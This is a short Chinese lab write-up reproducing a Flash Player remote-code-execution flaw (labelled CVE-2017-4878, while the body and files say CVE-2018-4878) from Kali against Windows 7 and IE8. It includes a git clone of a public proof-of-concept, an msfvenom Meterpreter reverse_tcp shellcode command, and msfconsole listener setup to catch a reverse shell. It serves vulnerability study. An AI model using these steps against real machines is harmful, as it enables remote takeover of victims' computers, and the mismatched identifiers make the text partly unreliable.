CVE-2017-4878 漏洞复现
**
漏洞介绍
**
1、漏洞概述
Flash Player当前最新版本28.0.0.137以及之前的所有版本
2 漏洞复现环境:
渗透机:Kali Linux + POC代码
靶机:win7+IE8.0+FLASH player
为了节省时间直接在 GitHub上下载poc 代码
3 漏洞复现实验过程:
复制下载链接:
git clone https://github/anbai-inc/CVE-2018-4878.git
使用git clone 命令 + 下载链接的方式 将POC 代码复制到本地 home目录下
或者直接在本机上下载然后复制到kali 中也是一样的效果
打开文件
我们需要对cve-2018-48778.py进行修改
将True 修改为False
还需要替换掉代码中原有的shellcode
使用命令
Msfvenom -p windows/meterpreter/reverse_tcp lhost = ip lport = port –f python > filename.txt
Cat shellcode.txt
将生成的shellcode.txt 内容替换原来 cve-2018-4878.py 中的shellcode
运行python 程序
运行出错了
貌似是程序中路径的问题
将路径修改成当前文件的路径
运行成功
查看文件
进入msfconsole 设置载荷
设置lhost 和lport
打开IE 访问http://192.168.88.107/test.html
但是由于电脑 falsh 插件的更新 和补丁的修复
没有向kali 反弹shell 如果换为28.0.0.137以及之前的所有版本都会建立反弹shell
更多推荐
CVE-2017-4878 漏洞复现(Flash Player当前最新版本28.0.0.137以及之前的所有版本)
发布评论